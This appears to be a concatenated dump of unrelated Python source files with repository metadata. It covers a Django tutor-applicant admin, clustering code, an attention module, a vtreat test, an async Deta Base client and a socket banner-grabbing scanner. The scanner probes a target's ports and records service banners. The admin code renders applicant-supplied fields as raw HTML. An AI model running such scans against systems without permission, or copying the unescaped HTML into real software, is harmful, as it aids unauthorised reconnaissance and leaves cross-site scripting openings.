in\"\n\n def completed_steps(self, obj: TutorApplicantTrack):\n steps = obj.determine_completed_steps()\n return \"<br/>\".join([x for x, v in steps.items() if v])\n\n completed_steps.allow_tags = True\n\n def full_name(self, obj: NewTutorApplicant):\n return obj.resolve_field([\"firstName\", \"lastName\"])\n\n def gender(self, obj: NewTutorApplicant):\n return obj.resolve_field(\"gender\")\n\n def address(self, obj):\n return obj.resolve_field([\"state\"])\n\n def phone(self, obj):\n return obj.resolve_field(\"phone\")\n\n def current_step(self, obj):\n return f\"<p>{obj.current_step}</p><p>{obj.application_step}</p>\"\n\n current_step.allow_tags = True\n\n def dob(self, obj):\n return obj.resolve_field(\"dateOfBirth\")\n\n def delivery_method(self, obj):\n return obj.availability.get(\"preferredLessonType\")\n\n def educations(self, obj: NewTutorApplicant):\n return \"<br/>\".join(\n [\n f\"<p><strong>{x.get('degree')}</strong> {x.get('course')}</p><p>{x.get('school')}</p><p>Start: {x.get('startYear')} End: {x.get('endYear')}</p>\"\n for x in obj.educations\n ]\n )\n\n educations.allow_tags = True\n\n def work_experiences(self, obj: NewTutorApplicant):\n return \"<br/>\".join(\n [\n f\"<p><strong>{x.get('role')}</strong></p><p>{x.get('company')}</p><p>Start: {x.get('startYear')}, End: {x.get('endYear')}</p><p>Teaching Role: {x.get('isTeachingRole')}</p>\"\n for x in obj.work_experiences\n ]\n )\n\n work_experiences.allow_tags = True\n\n def tutor_remarks(self, obj: NewTutorApplicant):\n remark = obj.tutor_remarks()\n return \"<br/>\".join(\n [\n f'<p style=\"margin-right: 20px;\">{x.get(\"action\")}-{x.get(\"remark\")}</p><p>{x.get(\"staff\")}</p><p>{x.get(\"created\")}</p>'\n for x in remark\n ]\n )\n\n tutor_remarks.allow_tags = True\n\n def references(self, obj):\n return (\n '<a href=\"/we-are-allowed/tutor_management/references/?q=%s\" target=\"_blank\">References</a>'\n % (obj.email,)\n )\n\n references.allow_tags = True\n\n def skills(self, obj: NewTutorApplicant):\n def with_link(o):\n if o.status == TutorSkill.ACTIVE:\n return f'<a target=\"_blank\" href=\"{o.get_absolute_url()}\"><strong>{o.skill.name}</strong></a>'\n if o.status == TutorSkill.PENDING:\n return f'<a target=\"_blank\" href=\"/we-are-allowed/tutor_management/tutorskill/?q={obj.email}\"><strong>{o.skill.name}</strong></a>'\n\n return f\"<strong>{o.skill.name}</strong>\"\n\n arr = \"<br/>\".join(\n [f\"{with_link(x)} ({x.get_status_display()})\" for x in obj.user_skills]\n )\n return arr\n\n skills.allow_tags = True\n\n def payment_info(self, obj):\n x = obj.payment_info\n if x:\n return f'<p>Bank: {x.get(\"bankName\")}</p><p>Name: {x.get(\"accountName\")}</p><p>Account Number: {x.get(\"accountNumber\")}</p><p>Tax id: {x.get(\"taxId\")}</p>'\n\n payment_info.allow_tags = True\n\n def date_applied(self, obj):\n return obj.date_joined\n\n def user_identity_info(self, obj):\n return obj.identity_pic()\n\n user_identity_info.allow_tags = True\n user_identity_info.short_description = \"Identity\"\n\n def video_intro(self, obj):\n video_summary = obj.others.get(\"videoSummary\")\n if video_summary:\n url = video_summary.get(\"url\")\n id = video_summary.get(\"id\")\n if url and id:\n return '<a href=\"{}\" target=\"_blank\">Video Summary</a>'.format(url)\n return \"\"\n\n video_intro.allow_tags = True\n video_intro.short_description = \"Video summary\"\n\n def references(self, obj: NewTutorApplicant):\n res = \"\"\n if obj.guarantors:\n for guarantor in obj.guarantors:\n res += \"\"\"\n <div>\n <p style=\"font-weight: 
700;\">{title} {fullName}</p>\n <p>{occupation}, {company}</p>\n <p>{email}, {phone}</p>\n <hr />\n </div>\n \"\"\".format(\n **guarantor\n )\n return res\n\n references.allow_tags = True\n\n def update_application_step_without_email(self, request, queryset):\n current_step = request.POST.get(\"current_step\")\n application_step = request.POST.get(\"application_step\")\n if current_step or application_step:\n for tutor in queryset.all():\n tutor.notify_to_update_step(\n application_step, current_step, sendMail=False\n )\n tutor.add_remark_action(\n {\"action\": \"update_step\", \"remark\": \"\", \"staff\": request.user.email}\n )\n self.message_user(request, \"Notified tutors to update step\")\n else:\n self.message_user(\n request, \"Current step or application step missing\", messages.ERROR\n )\n\n # actions\n def update_application_step(self, request, queryset):\n current_step = request.POST.get(\"current_step\")\n application_step = request.POST.get(\"application_step\")\n if current_step or application_step:\n for tutor in queryset.all():\n tutor.notify_to_update_step(application_step, current_step)\n tutor.add_remark_action(\n {\"action\": \"update_step\", \"remark\": \"\", \"staff\": request.user.email}\n )\n self.message_user(request, \"Notified tutors to update step\")\n else:\n self.message_user(\n request, \"Current step or application step missing\", messages.ERROR\n )\n\n def re_approve_tutors(self, request, queryset):\n for q in queryset:\n q.notify_to_update_step(None, \"complete\", sendMail=False)\n user_ids = queryset.values_list(\"pk\", flat=True)\n UserProfile.objects.filter(user_id__in=list(user_ids)).update(\n application_status=UserProfile.VERIFIED\n )\n self.message_user(request, \"Application status changed to approved\")\n\n def revert_approval_status(self, request, queryset):\n user_ids = queryset.values_list(\"pk\", flat=True)\n UserProfile.objects.filter(user_id__in=list(user_ids)).update(\n application_status=UserProfile.PENDING\n )\n self.message_user(request, \"Application status changed to pending\")\n\n def export_as_csv(self, request, queryset):\n \"\"\"Ability to export all the details about tutor applicants\"\"\"\n rows = (\n [\n obj.resolve_field([\"firstName\", \"lastName\"]),\n obj.resolve_field(\"phone\"),\n obj.email,\n obj.profile.get_application_status_display(),\n obj.current_step,\n obj.application_step,\n obj.determine_completed_steps(),\n ]\n for obj in queryset.prefetch_related(\"profile\").all()\n )\n response = streaming_response(rows, \"all_tutor_applicants\")\n return response\n\n def freeze_tutor_profile(self, request, queryset):\n # this is a two step action. 
the first is to change the tutor\n # application status to frozen and the second is to mark all\n # active and pending subjects as suspended\n for k in queryset.all():\n TutorSkill.objects.filter(\n tutor_id=k.id, status__in=[TutorSkill.ACTIVE, TutorSkill.PENDING]\n ).update(status=TutorSkill.SUSPENDED)\n k.to_mailing_list()\n user_ids = queryset.values_list(\"pk\", flat=True)\n UserProfile.objects.filter(user_id__in=list(user_ids)).update(\n application_status=UserProfile.FROZEN\n )\n self.message_user(request, \"Frozen account successful\")\n\n def update_approved_tutors_status(self, request, queryset):\n for q in queryset:\n q.notify_to_update_step(None, \"application-verified\", sendMail=False)\n self.message_user(\n request,\n \"All approved tutor 'current-step' updated to 'application verified'\",\n )\n\n def update_current_step_for_existing_tutors(self, request, queryset):\n counter = 0\n for q in queryset:\n if q.approved:\n q.update_verified_tutors_current_step()\n counter += 1\n q.to_mailing_list()\n self.message_user(request, f\"{counter} verified tutors 'current-step' updated\")\n\n def update_not_approved_tutors_status(self, request, queryset):\n counter = 0\n for q in queryset:\n result = q.update_applicant_to_complete()\n if result:\n counter += 1\n q.to_mailing_list()\n self.message_user(request, f\"{counter} applicants moved to completed\")\n\n def sync_to_mailing_list(self, request, queryset):\n for i in queryset:\n i.to_mailing_list()\n\n\n@admin.register(NewTutorApplicant)\nclass NewTutorApplicantAdmin(TutorApplicantTrackAdmin):\n date_hierarchy = \"date_joined\"\n actions = [\n \"approve_applicant\",\n \"deny_applicant\",\n \"approve_identity\",\n \"reject_identity\",\n \"reupload_video_intro\",\n ]\n list_filter = [\n GenderFilter,\n IdentityApprovedFilter,\n VideoSummaryApprovedFilter,\n GuarantorsApprovedFilter,\n StateFilter,\n ]\n list_display = TutorApplicantTrackAdmin.main_fields\n actions = [\"approve_applicant\", \"deny_applicant\"]\n\n def get_queryset(self, request):\n return (\n super()\n .get_queryset(request)\n .exclude(\n profile__application_status__in=[\n UserProfile.VERIFIED,\n UserProfile.DENIED,\n ]\n )\n # .by_current_step([\"application-verified\"], True)\n .by_current_step(\n [\"complete\", \"application-verified\", \"terms\", \"preferences\"], True\n )\n )\n\n def user_identity_info(self, obj):\n res = \"\"\n if obj.user_identity_info:\n if obj.tutor_id_verified:\n return \"Identity approved\"\n res += \"\"\"\n <button type=\"button\" data-info=\"{}\" data-email=\"{}\" data-button-type=\"identity\"\n class=\"btn btn-primary btn-sm clientRequestJs {}\" style=\"font-size: 10px;\">\n Verify identity</button>\n \"\"\".format(\n escapejs(\n json.dumps(\n {\n \"personal_info\": obj.revamp_data(\"personalInfo\"),\n \"identity\": obj.revamp_data(\"identity\"),\n \"actual_id\": obj.user_identity_info,\n \"user_id\": obj.pk,\n }\n )\n ),\n obj.email,\n f\"id_{obj.pk}\",\n )\n\n return res\n\n user_identity_info.allow_tags = True\n user_identity_info.short_description = \"Identity\"\n\n def video_intro(self, obj):\n res = \"\"\n if obj.video_verified:\n return \"Video approved\"\n if obj.video_intro:\n res += \"\"\"\n <button type=\"button\" data-info=\"{}\" data-email=\"{}\" data-button-type=\"video\"\n class=\"btn btn-primary btn-sm clientRequestJs {}\" style=\"font-size: 10px;\">\n Review video</button>\n \"\"\".format(\n escapejs(\n json.dumps(\n {\n \"personal_info\": obj.revamp_data(\"personalInfo\"),\n \"user_id\": obj.pk,\n \"others\": 
obj.revamp_data(\"others\"),\n }\n )\n ),\n obj.email,\n f\"id_{obj.pk}\",\n )\n\n return res\n\n video_intro.allow_tags = True\n video_intro.short_description = \"Video summary\"\n\n def references(self, obj: NewTutorApplicant):\n res = \"\"\n if obj.guarantors_approved():\n return \"Guarantors approved\"\n if obj.guarantors:\n res += \"\"\"\n <button type=\"button\" data-info=\"{}\"\n class=\"btn btn-primary btn-sm referencesBtn {}\" style=\"font-size: 10px;\">\n Review guarantors</button>\n \"\"\".format(\n escapejs(json.dumps({\"guarantors\": obj.guarantors, \"user_id\": obj.pk})),\n f\"id_{obj.pk}\",\n )\n return res\n\n references.allow_tags = True\n\n # admin actions\n def approve_applicant(self, request, queryset):\n for tutor in queryset.all():\n tutor.approve_applicant()\n tutor.add_remark_action(\n {\"action\": \"approve_tutor\", \"remark\": \"\", \"staff\": request.user.email}\n )\n self.message_user(request, \"Applications approved\")\n\n\n def deny_applicant(self, request, queryset):\n for tutor in queryset.all():\n tutor.deny_applicant()\n tutor.add_remark_action(\n {\"action\": \"deny_tutor\", \"remark\": \"\", \"staff\": request.user.email}\n )\n self.message_user(request, \"Applications denied\")\n\n\n@admin.register(Reference)\nclass ReferenceAdmin(admin.ModelAdmin):\n list_display = [\n \"tutor\",\n \"email\",\n \"first_name\",\n \"last_name\",\n \"no_of_years\",\n \"phone_no\",\n \"organization\",\n \"verified\",\n ]\n search_fields = [\"tutor__email\"]\n actions = [\"verify_guarantor\"]\n form = GuarantorForm\n\n def phone_no(self, obj):\n if obj.phone_no:\n return str(obj.phone_no)\n return \"\"\n\n def verify_guarantor(self, request, queryset):\n queryset.update(verified=True)\n\n def deny_guarantor(self, request, queryset):\n for q in queryset.all():\n notification_on_guarantor_delete.delay(q.pk)\n\n\n@admin.register(VerifiedTutor)\nclass VerifiedTutorAdmin(RVerifiedTutorAdmin):\n pass\n\n\n@admin.register(VerifiedTutorWithSkill)\nclass VerifiedTutorSkillsAdmin(RVerifiedTutorSkillsAdmin):\n pass\n\n\n@admin.register(TutorRevamp)\nclass TutorRevampAdmin(RTutorRevampAdmin):\n pass\n\n\n@admin.register(TutorSkill)\nclass TutorSkillAdmin(RTutorSkillAdmin):\n pass\n\n\n@admin.register(QuizSitting)\nclass QuizSittingAdmin(RQuizSittingAdmin):\n pass\n\n\n@admin.register(Skill)\nclass SkillAdmin(RSkillAdmin):\n pass\n","repo_name":"Jovimanical/main-codebase","sub_path":"tuteria/tutor_management/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":27909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23118782772","text":"import os\nfrom loguru import logger\nfrom helpers.matrix import read_matrix\n\n\n@logger.catch()\ndef read_object(user, name):\n if os.path.isfile(f'./system/{name}'):\n matrix = read_matrix()\n if matrix[f'./system/{name}'].get(user) \\\n and 'read' in matrix[f'./system/{name}'][user]:\n with open(f'./system/{name}', 'r', encoding=\"utf-8\") as f:\n print(f.read())\n logger.info(f'Access is allowed')\n else:\n logger.error(f'Access denied')\n else:\n logger.error(f'The file with the name \"{name}\" does not exist')\n","repo_name":"Baykanurov/HRU","sub_path":"modules/read_object.py","file_name":"read_object.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10245768936","text":"\nimport numpy as np\nimport pandas as pd\nfrom vtreat.util import grouped_by_x_statistics, 
pooled_impact_estimate\nfrom vtreat.vtreat_impl import fit_binomial_impact_code, fit_regression_impact_code\n\n\ndef test_grouped_stats():\n # from: https://github.com/WinVector/Examples/blob/main/PartialPooling/PartialPooling.ipynb\n # set state of pseudo random number generator for repeatability\n rng = np.random.default_rng(2023)\n # set parameters to specific values\n example_between_locations_sd = 3.0\n example_per_observations_sd = 10.0\n n_locations = 10\n n_obs_per_location = 3\n\n def generate_example_centers() -> pd.DataFrame:\n \"\"\"generate the unobserved location values\"\"\"\n example_location_value_mean = rng.normal(loc=0, scale=15, size=1)\n example_locations = pd.DataFrame({\n \"location_id\": range(n_locations),\n \"effect\": rng.normal(\n loc=example_location_value_mean, \n scale=example_between_locations_sd, \n size=n_locations)\n })\n return example_locations\n \n example_locations = generate_example_centers()\n\n def generate_observations(example_locations: pd.DataFrame)-> pd.DataFrame:\n \"\"\"\n generate observed data\n\n :param example_locations: the (unobserved) ground truth to generate from\n :return: observed data\n \"\"\"\n assert isinstance(example_locations, pd.DataFrame)\n observations = []\n for j in range(example_locations.shape[0]):\n obs_j = pd.DataFrame({\n \"location_id\": j,\n \"observation\": rng.normal(\n loc=example_locations.effect[j], \n scale=example_per_observations_sd, \n size=n_obs_per_location),\n })\n observations.append(obs_j)\n observations = pd.concat(observations, ignore_index=True)\n return observations\n\n observations = generate_observations(example_locations)\n grouped_stats = grouped_by_x_statistics(observations[\"location_id\"], observations[\"observation\"])\n assert isinstance(grouped_stats, pd.DataFrame)\n pooled_stats = pooled_impact_estimate(observations[\"location_id\"], observations[\"observation\"])\n assert isinstance(pooled_stats, pd.DataFrame)\n assert grouped_stats.shape[0] == pooled_stats.shape[0]\n assert np.all(pooled_stats['x'] == grouped_stats['x'])\n xform = fit_binomial_impact_code(\n incoming_column_name=\"test\",\n x=observations[\"location_id\"],\n y=observations[\"observation\"] >= 0,\n extra_args={\"outcome_target\": True, \"var_suffix\": \"_v\"},\n params={\"use_hierarchical_estimate\": True},\n )\n xfc = xform.code_book_\n assert isinstance(xfc, pd.DataFrame)\n v = \"test_logit_code_v\"\n assert np.max(xfc[v]) > np.min(xfc[v])\n xform = fit_regression_impact_code(\n incoming_column_name=\"test\",\n x=observations[\"location_id\"],\n y=observations[\"observation\"],\n extra_args={\"var_suffix\": \"_v\"},\n params={\"use_hierarchical_estimate\": True},\n )\n xfc = xform.code_book_\n assert isinstance(xfc, pd.DataFrame)\n v = \"test_impact_code\"\n assert np.max(xfc[v]) > np.min(xfc[v])\n\n","repo_name":"WinVector/pyvtreat","sub_path":"pkg/tests/test_grouped_stats.py","file_name":"test_grouped_stats.py","file_ext":"py","file_size_in_byte":3206,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"16"} +{"seq_id":"436624660","text":"import math\r\nimport random\r\nimport numpy as np\r\n\r\n#datapoint class\r\nclass Datapoint:\r\n def __init__(self,attr,op=''):\r\n self.attr=attr\r\n self.op = op\r\n\r\n def display(self):\r\n print(self.attr,'\\t\\t',self.op)\r\n\r\n def dist_from(self,point):\r\n d = 0\r\n for i in range(len(self.attr)):\r\n d += (point[i]-self.attr[i])**2\r\n return math.sqrt(d)\r\n\r\n#load data\r\ndataset = []\r\nfile = 
open('iris.data','r')\r\nlines = file.readlines()[:-1]\r\nfile.close()\r\n#index=0\r\nfor line in lines:\r\n op = line.split(',')[-1]\r\n attr = list(map(float,line.split(',')[:-1]))\r\n d1 = Datapoint(attr,op)\r\n dataset.append(d1)\r\n\r\n\r\n#mean function\r\ndef medoid(datapoints):\r\n mean = [0]*len(datapoints[0].attr)\r\n count = len(datapoints)\r\n for i in range(len(datapoints[0].attr)):\r\n for datapoint in datapoints:\r\n mean[i] += datapoint.attr[i]\r\n mean[i] = mean[i]/count\r\n\r\n reqd_dp = datapoints[0]\r\n mn = 1000\r\n for datapoint in datapoints:\r\n if datapoint.dist_from(mean) < mn:\r\n reqd_dp = datapoint\r\n mn = datapoint.dist_from(mean)\r\n \r\n return reqd_dp.attr\r\n\r\n\r\n#cluster class\r\nclass Cluster:\r\n def __init__(self,datapoints):\r\n self.datapoints = datapoints\r\n self.count = len(self.datapoints)\r\n self.medoid = medoid(self.datapoints)\r\n\r\n def re_init(self):\r\n self.datapoints = []\r\n self.count = 0\r\n\r\n def addDatapoint(self,datapoint):\r\n self.datapoints.append(datapoint)\r\n self.count += 1\r\n self.medoid = medoid(self.datapoints)\r\n\r\n def display(self):\r\n print('Medoid is ',self.medoid)\r\n print('Datapoints are ')\r\n for datapoint in self.datapoints:\r\n datapoint.display()\r\n\r\n\r\n#function for distance of datapoint from a cluster\r\ndef distance(datapoint,cluster):\r\n p1 = datapoint.attr\r\n p2 = cluster.medoid\r\n d = 0\r\n for i in range(len(p2)):\r\n d += (p1[i]-p2[i])**2\r\n return math.sqrt(d)\r\n\r\n \r\n\r\n#initiate random clusters\r\nclist = []\r\nk=3\r\nfor i in range(k):\r\n rint = random.randint(0,len(dataset)-1)\r\n c1 = Cluster([dataset[rint]])\r\n clist.append(c1)\r\n\r\nfor cluster in clist:\r\n cluster.display()\r\n\r\n\r\n#main program\r\nprev_medoid = []\r\nfor i in range(k):\r\n prev_medoid .append([0]*len(dataset[0].attr))\r\n\r\nwhile True:\r\n for datapoint in dataset:\r\n min_dist=1000\r\n min_cluster=clist[0]\r\n for cluster in clist:\r\n if distance(datapoint,cluster) < min_dist:\r\n min_dist = distance(datapoint,cluster)\r\n min_cluster = cluster\r\n min_cluster.addDatapoint(datapoint)\r\n\r\n curr_medoid = []\r\n for cluster in clist:\r\n curr_medoid.append(cluster.medoid)\r\n\r\n print('Medoid ',curr_medoid)\r\n\r\n if curr_medoid == prev_medoid:\r\n break\r\n\r\n prev_medoid = curr_medoid\r\n\r\n for cluster in clist:\r\n cluster.re_init()\r\n\r\nindex = 0\r\nfor cluster in clist:\r\n print('Cluster ',index)\r\n cluster.display()\r\n\r\n\r\n#125/150\r\n\r\n\r\n","repo_name":"ableabhinav/dwdmlabs","sub_path":"5. 
Clustering/kmedoids.py","file_name":"kmedoids.py","file_ext":"py","file_size_in_byte":3057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"69796635527","text":"import torch\nfrom torch import nn\n\nclass GlobalSpatialAttention(nn.Module):\n def __init__(self, in_channels, num_reduced_channels):\n super().__init__()\n \n self.conv1x1_q = nn.Conv2d(in_channels, num_reduced_channels, 1, 1)\n self.conv1x1_k = nn.Conv2d(in_channels, num_reduced_channels, 1, 1)\n self.conv1x1_v = nn.Conv2d(in_channels, num_reduced_channels, 1, 1)\n self.conv1x1_att = nn.Conv2d(num_reduced_channels, in_channels, 1, 1)\n \n def forward(self, feature_maps, global_channel_output):\n query = self.conv1x1_q(feature_maps)\n N, C, H, W = query.shape\n query = query.reshape(N, C, -1)\n key = self.conv1x1_k(feature_maps).reshape(N, C, -1)\n \n query_key = torch.bmm(key.permute(0, 2, 1), query)\n query_key = query_key.reshape(N, -1).softmax(-1)\n query_key = query_key.reshape(N, int(H*W), int(H*W))\n value = self.conv1x1_v(feature_maps).reshape(N, C, -1)\n att = torch.bmm(value, query_key).reshape(N, C, H, W)\n att = self.conv1x1_att(att)\n \n return (global_channel_output * att) + global_channel_output\n","repo_name":"LinkAnJarad/global_local_attention_module_pytorch","sub_path":"global_local_attention_module_pytorch/global_spatial_attention.py","file_name":"global_spatial_attention.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"16"} +{"seq_id":"30041629575","text":"import socket, sys, requests\n\nip = sys.argv[1]\n\nfile = open(sys.argv[2], \"r\")\n\nfor linha in file.readlines():\n porta = linha.split(\":\")\n porta = int(porta[1].strip())\n try:\n socket.setdefaulttimeout(15)\n s = socket.socket()\n s.connect((ip, porta))\n if porta == 80 or porta == 443:\n http_request = 'GET HTPP/1.1 \\r\\n'\n s.send(http_request.encode())\n\n banner = s.recv(2048)\n banner = banner.decode()\n s.close()\n print(\"[+] \" + ip + \" >>> \" + str(banner))\n\n arquivo = open(\"servicos_\" + ip + \".txt\", \"+a\")\n arquivo.write(\"Servico da porta: \" + str(porta))\n arquivo.write(str(banner) + '\\n')\n arquivo.close()\n except:\n print(\"Nao foi possivel detectar o banner\")\n","repo_name":"mauricioomateus/ferramentas-scan","sub_path":"banner.py","file_name":"banner.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25880934043","text":"\"\"\"Async Deta Base module.\r\n\r\nAsync implementation of DetaBase.\r\n\"\"\"\r\n\r\nfrom http import HTTPStatus\r\nfrom types import TracebackType\r\nfrom typing import Any, Optional\r\n\r\nfrom aiohttp import ClientSession, ClientTimeout\r\n\r\nfrom deta_py.deta_base.queries import ItemUpdate, Query\r\nfrom deta_py.deta_base.results import QueryResult\r\nfrom deta_py.deta_base.utils import (\r\n BASE_API_URL,\r\n ITEMS_BATCH_SIZE,\r\n REQUEST_TIMEOUT,\r\n ExpireAt,\r\n ExpireIn,\r\n insert_ttl,\r\n)\r\nfrom deta_py.utils import parse_data_key\r\n\r\n\r\nclass AsyncDetaBase(object): # noqa: WPS214\r\n \"\"\"Async Deta Base client.\"\"\"\r\n\r\n def __init__(self, data_key: str, base_name: str):\r\n \"\"\"Init async Deta Base client.\r\n\r\n You can generate Data Key in your project or collection settings.\r\n\r\n New aiohttp session is initialized.\r\n Don't forget to call `base.close()` to close connection.\r\n\r\n Args:\r\n data_key (str): Deta 
project data key.\r\n base_name (str): Deta Base name.\r\n \"\"\"\r\n self.data_key = data_key\r\n self.base_name = base_name\r\n\r\n project_id, _ = parse_data_key(data_key)\r\n self.base_url = BASE_API_URL.format(\r\n project_id=project_id,\r\n base_name=base_name,\r\n )\r\n\r\n self._session = ClientSession(\r\n headers={\r\n 'X-API-Key': self.data_key,\r\n 'Content-Type': 'application/json',\r\n },\r\n timeout=ClientTimeout(total=REQUEST_TIMEOUT),\r\n )\r\n\r\n async def put(\r\n self,\r\n *items: dict[str, Any],\r\n expire_at: Optional[ExpireAt] = None,\r\n expire_in: Optional[ExpireIn] = None,\r\n ) -> list[dict[str, Any]]:\r\n \"\"\"Put items to the base.\r\n\r\n If item with the same key already exists, it will be overwritten.\r\n\r\n Items are splitted into batches of 25 items and put in parallel.\r\n\r\n You can specify either expire_at or expire_in to set item TTL.\r\n If both are specified, expire_at will be used.\r\n\r\n Args:\r\n items (dict[str, Any]): Items to put.\r\n expire_at (Optional[ExpireAt]): Item expire time.\r\n expire_in (Optional[ExpireIn]): Item expire time delta.\r\n\r\n Returns:\r\n list[dict[str, Any]]: List of successfully processed items.\r\n \"\"\"\r\n processed = []\r\n while items:\r\n batch_items = list(items[:ITEMS_BATCH_SIZE])\r\n items = items[ITEMS_BATCH_SIZE:]\r\n batch_processed = await self._put_batch(\r\n batch_items,\r\n expire_at=expire_at,\r\n expire_in=expire_in,\r\n )\r\n processed.extend(batch_processed)\r\n\r\n return processed\r\n\r\n async def get(self, key: str) -> Optional[dict[str, Any]]:\r\n \"\"\"Get item from the base.\r\n\r\n Args:\r\n key (str): Item key.\r\n\r\n Returns:\r\n Optional[dict[str, Any]]: Item or None if not found.\r\n \"\"\"\r\n async with self._session.get(\r\n self._get_url('/items/{key}', key=key),\r\n ) as response:\r\n if response.status == HTTPStatus.OK:\r\n item: dict[str, Any] = await response.json()\r\n return item\r\n return None\r\n\r\n async def delete(self, key: str) -> None:\r\n \"\"\"Delete item from the base.\r\n\r\n Args:\r\n key (str): Item key.\r\n \"\"\"\r\n # probably some response processing will be added in future,\r\n # so empty manager body currently ignored\r\n async with self._session.delete( # noqa: WPS328\r\n self._get_url('/items/{key}', key=key),\r\n ):\r\n pass # noqa: WPS420\r\n\r\n async def insert(\r\n self,\r\n item: dict[str, Any],\r\n expire_at: Optional[ExpireAt] = None,\r\n expire_in: Optional[ExpireIn] = None,\r\n ) -> Optional[dict[str, Any]]:\r\n \"\"\"Insert item to the base.\r\n\r\n If item with the same key already exists, it will not be inserted.\r\n\r\n You can specify either expire_at or expire_in to set item TTL.\r\n If both are specified, expire_at will be used.\r\n\r\n Args:\r\n item (dict[str, Any]): Item to insert.\r\n expire_at (Optional[ExpireAt]): Item expire time.\r\n expire_in (Optional[ExpireIn]): Item expire time delta.\r\n\r\n Returns:\r\n Optional[dict[str, Any]]: Inserted item \\\r\n or None if item with the same key already exists.\r\n \"\"\"\r\n item = insert_ttl(item, expire_at, expire_in)\r\n async with self._session.post(\r\n self._get_url('/items'),\r\n json={'item': item},\r\n ) as response:\r\n if response.status == HTTPStatus.CREATED:\r\n inserted_item: dict[str, Any] = await response.json()\r\n return inserted_item\r\n return None\r\n\r\n async def update(\r\n self,\r\n key: str,\r\n operations: ItemUpdate,\r\n expire_at: Optional[ExpireAt] = None,\r\n expire_in: Optional[ExpireIn] = None,\r\n ) -> bool:\r\n \"\"\"Update item in the 
base.\r\n\r\n You can specify either expire_at or expire_in to set item TTL.\r\n If both are specified, expire_at will be used.\r\n\r\n Example:\r\n >>> operations = ItemUpdate()\r\n >>> operations.set(name='John')\r\n >>> operations.increment(age=1)\r\n >>> operations.append(friends=['Jane'])\r\n >>> operations.delete('hobbies')\r\n >>> await base.update(operations)\r\n\r\n Args:\r\n key (str): Item key.\r\n operations (ItemUpdate): Update operations.\r\n expire_at (Optional[ExpireAt]): Item expire time.\r\n expire_in (Optional[ExpireIn]): Item expire time delta.\r\n\r\n Returns:\r\n bool: True if item was updated, False if not found.\r\n \"\"\"\r\n operations.set(**insert_ttl({}, expire_at, expire_in))\r\n async with self._session.patch(\r\n self._get_url('/items/{key}', key=key),\r\n json=operations.as_json(),\r\n ) as response:\r\n return response.status == HTTPStatus.OK\r\n\r\n async def query(\r\n self,\r\n query: Optional[Query] = None,\r\n limit: int = 1000,\r\n last: Optional[str] = None,\r\n ) -> QueryResult:\r\n \"\"\"Fetch items in the base.\r\n\r\n If result contains more than 1000 items, it will be paginated.\r\n\r\n You can use `last` key from the previous query to get next page.\r\n Example:\r\n >>> query = [{'age': {'$gt': 18}}]\r\n >>> res = base.query(query)\r\n >>> items = res.items\r\n >>> while res.last:\r\n ... res = db.fetch(last=res.last)\r\n ... items += res.items\r\n\r\n Args:\r\n query (Optional[Query]): List of queries.\r\n limit (int): Limit of items to return.\r\n last (Optional[str]): Last key of the previous query.\r\n\r\n Returns:\r\n QueryResult: Query result.\r\n \"\"\"\r\n if isinstance(query, dict):\r\n query = [query]\r\n\r\n async with self._session.post(\r\n self._get_url('/query'),\r\n json={\r\n 'query': query,\r\n 'limit': limit,\r\n 'last': last,\r\n },\r\n ) as response:\r\n if response.status == HTTPStatus.OK:\r\n data: dict[str, Any] = await response.json()\r\n return QueryResult(\r\n items=data['items'],\r\n count=data['paging']['size'],\r\n last=data['paging'].get('last'),\r\n )\r\n\r\n return QueryResult(items=[], count=0, last=None)\r\n\r\n async def __aenter__(self) -> 'AsyncDetaBase':\r\n \"\"\"Enter context manager.\r\n\r\n Returns:\r\n DetaBase: Deta Base client.\r\n \"\"\"\r\n return self\r\n\r\n async def __aexit__(\r\n self,\r\n exc_type: Optional[type[BaseException]],\r\n exc_value: Optional[BaseException],\r\n exc_traceback: Optional[TracebackType],\r\n ) -> None:\r\n \"\"\"Exit context manager.\r\n\r\n Args:\r\n exc_type (Optional[type[BaseException]]): Exception type.\r\n exc_value (Optional[BaseException]): Exception value.\r\n exc_traceback (Optional[TracebackType]): Exception traceback.\r\n \"\"\"\r\n await self.close()\r\n\r\n async def close(self) -> None:\r\n \"\"\"Close aiohttp session.\"\"\"\r\n await self._session.close()\r\n\r\n async def _put_batch(\r\n self,\r\n batch_items: list[dict[str, Any]],\r\n expire_at: Optional[ExpireAt] = None,\r\n expire_in: Optional[ExpireIn] = None,\r\n ) -> list[dict[str, Any]]:\r\n \"\"\"Put batch of items to the base.\r\n\r\n Args:\r\n batch_items (list[dict[str, Any]]): Items to put.\r\n expire_at (Optional[ExpireAt]): Item expire time.\r\n expire_in (Optional[ExpireIn]): Item expire time delta.\r\n\r\n Returns:\r\n list[dict[str, Any]]: List of successfully processed items.\r\n \"\"\"\r\n batch_items = [\r\n insert_ttl(item, expire_at, expire_in)\r\n for item in batch_items\r\n ]\r\n async with self._session.put(\r\n self._get_url('/items'),\r\n json={'items': batch_items},\r\n ) 
